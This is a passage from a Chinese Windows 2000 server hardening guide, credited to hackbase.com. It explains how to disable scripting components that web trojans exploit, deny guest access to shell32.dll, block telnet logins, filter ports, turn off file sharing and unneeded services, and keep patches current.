　　Wscript.Shell可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。 HKEY_CLASSES_ROOT\Wscript.Shell\ 及HKEY_CLASSES_ROOT\Wscript.Shell.1\改名为其它的名字。将两项clsid的值也改一下 HKEY_CLASSES_ROOT\Wscript.Shell\CLSID\项目的值和HKEY_CLASSES_ROOT\ Wscript.Shell.1\CLSID\项目的值，也可以将其删除。

　　3、禁用Shell.Application组件

　　Shell.Application也可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。 HKEY_CLASSES_ROOT\Shell.Application\ 及HKEY_CLASSES_ROOT\Shell.Application.1\ 改名为其它的名字。将HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值 HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值更改或删除。同时，禁止Guest用户使用 shell32.dll来防止调用此组件。使用命令：cacls C:\WINNT\system32\shell32.dll /e /d guests

　　4、FileSystemObject组件

　　FileSystemObject可以对文件进行常规操作可以通过修改注册表，将此组件改名，来防止此类木马的危害。对应注册表项为HKEY_CLASSES_ROOT\ scripting.FileSystemObject\。可以禁止guests用户使用或直接将其删除。考虑到很多的上传都会使用到这个组件，为了方便，这里不建议更改或删除。

　　5、禁止telnet登陆

　　在C:\WINNT\system32目录下有个login.cmd文件，将其用记事本打开，在文件末尾另取一行，加入exit保存。这样用户在登陆telnet时，便会立即自动退出。

　　注：以上修改注册表操作均需要重新启动WEB服务后才会生效。

　　六、端口设置

　　端口窗体底端就是门，这个比喻非常形象。如果我们服务器的所有端口都开放的话，那就意味着黑客有好多门可以进行入侵。所以我个人觉得，关闭未使用的端口是一件重要的事情。在控制面板――网络与拨号连接――本地连接――属性――Internet协议(TCP/IP)属性，点击高级，进入高级TCP/IP设置，选择选项，在可选的设置中选择TCP/IP筛选，启用TCP/IP筛选。添加需要的端口，如21、80等，关闭其余的所有未使用的端口。

　　七、关闭文件共享

　　系统默认是启用了文件共享功能的。我们应给予取消。在控制面板――网络和拨号连接――本地连接――属性，在常规选项种，取消Microsoft 网络文件和打印共享。服务最少原则是保障安全的一项重要原则。非必要的服务应该给予关闭。系统服务可以在控制面板――管理工具――服务中进行设定。

　　八、关闭非必要服务

　　类似telnet服务、远程注册表操作等服务应给予禁用。同时尽可能安装最少的软件。这可以避免一些由软件漏洞带来的安全问题。有些网管在服务器上安装QQ，利用服务器挂QQ，这种做法是极度错误的。

　　九、关注安全动态及时更新漏洞补丁

　　更新漏洞补丁对于一个网络管理员来说是非常重要的。更新补丁，可以进一步保证系统的安全。
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接：http://hackbase.com/tech/2007%2D12%2D21/10291419058/
Tags - 安全 ]]>